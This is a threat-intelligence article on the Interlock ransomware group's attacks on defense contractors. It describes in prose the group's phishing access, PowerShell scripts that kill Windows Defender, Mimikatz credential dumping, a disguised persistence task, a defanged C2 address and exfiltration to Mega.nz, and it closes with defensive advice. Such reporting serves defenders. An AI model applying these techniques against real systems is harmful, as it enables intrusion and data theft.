The Interlock ransomware group has escalated its cyberattacks, now focusing on defense contractors and their supply chains, posing significant threats to military logistics, intellectual property, and national security. First identified in September 2024, Interlock employs big-game hunting tactics, targeting high-value organizations, and utilizes double extortion methods by stealing data before encrypting systems.
Recent Incidents and Targets
Notable victims include AMTEC, a U.S.-based manufacturer of lethal ammunition for military and law enforcement, and its parent company, National Defense Corporation (NDC). Analysts from Resecurity have confirmed that Interlock’s data leak site, Worldwide Secrets Blog, now hosts classified documents referencing contracts with the U.S. Department of Defense (DoD), Raytheon, and Thales, among others.
Interlock’s shift toward defense sector targets aligns with current geopolitical tensions. The group exploits global conflicts as cover for espionage, often exfiltrating shipment schedules, warehouse locations, and engineering blueprints. For instance, leaked logistics data included a 2018 DoD contract for M739A1 fuzes bound for Yuma Proving Ground, detailing transportation codes and personnel contacts. Such breaches enable adversaries to disrupt supply chains or redirect shipments during transit.
Technical Sophistication and Attack Methods
Interlock’s technical sophistication lies in its hybrid approach. While the group has recently avoided deploying encryption binaries, opting instead for pure data theft, it employs Living-off-the-Land (LotL) techniques to evade detection. Attackers use legitimate tools like PowerShell and Windows Management Instrumentation (WMI) to execute malicious scripts. In the AMTEC breach, attackers deployed custom PowerShell scripts to disable security tools, such as terminating Windows Defender processes.
The group’s initial access often stems from phishing campaigns impersonating logistics partners or compromised third-party vendors. Once inside, attackers deploy custom PowerShell scripts to disable security tools. For instance, a script recovered from an infected AMTEC subsidiary terminated Windows Defender processes.
Resecurity’s analysis revealed that Interlock actors then use Mimikatz to dump credentials from lsass.exe, enabling lateral movement. A scheduled task named WindowsUpdateSync is created to maintain persistence, executing a Base64-encoded payload that connects to Interlock’s command-and-control (C2) server at `212.237.217[.]182`.
The group also exploits unpatched vulnerabilities in enterprise VPNs and Microsoft Exchange servers. In one case, attackers weaponized CVE-2024-21407, a critical privilege escalation flaw in Windows Kernel, to gain SYSTEM privileges. Post-exploitation, data exfiltration occurs via TLS-encrypted channels to cloud storage platforms like Mega.nz, bypassing traditional network monitoring.
Implications for National Security
Interlock’s focus on defense contractors underscores the vulnerability of global military supply chains. Leaked shipment records, such as those referencing Turkmenistan’s Ministry of Defense, risk altering geopolitical power dynamics. The U.S. Department of Defense and its contractors must bolster cybersecurity measures to mitigate these threats.
Recommendations for Defense Contractors
To defend against Interlock ransomware attacks, defense contractors should:
– Enhance Phishing Awareness: Conduct regular training to recognize and report phishing attempts.
– Implement Multi-Factor Authentication (MFA): Strengthen access controls to prevent unauthorized entry.
– Regularly Update Systems: Patch vulnerabilities promptly to reduce exploit risks.
– Monitor Network Activity: Utilize advanced threat detection to identify and respond to suspicious behavior.
– Develop Incident Response Plans: Establish protocols to address and recover from ransomware incidents effectively.
By adopting these measures, defense contractors can enhance their resilience against sophisticated cyber threats like Interlock.
